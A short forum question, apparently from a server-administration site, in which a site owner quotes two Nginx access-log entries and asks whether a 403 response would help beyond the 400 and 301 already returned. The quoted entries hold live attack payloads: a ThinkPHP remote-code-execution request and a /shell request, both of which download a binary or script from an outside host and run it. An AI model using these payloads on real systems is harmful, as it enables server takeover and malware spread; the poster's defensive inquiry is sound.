It is probably a very stupid question but I would like to confirm.
I found lines like
93.71.247.71 - - [19/Jan/2021:17:37:59 +0100] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://88.218.16.198/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1" 400 173 "-" "Uirusu/2.0"
or
71.208.10.233 - - [19/Jan/2021:09:27:41 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+ debes.venus.lol/jaws;sh+/tmp/jaws HTTP/1.1" 301 185 "-" "Hello, world"
in my Nginx access log. A web search lead me to Block Remote Code Execution Ubuntu Server Fail2Ban & Cloudflare where people proposed to catch such attacks by appropriate statements in the server configuration.
However, as far as I can see the server responds with a 400 or 301 already. So my question is: Would a server configuration returning a 403, as proposed in the answer to the question I linked above, make any difference?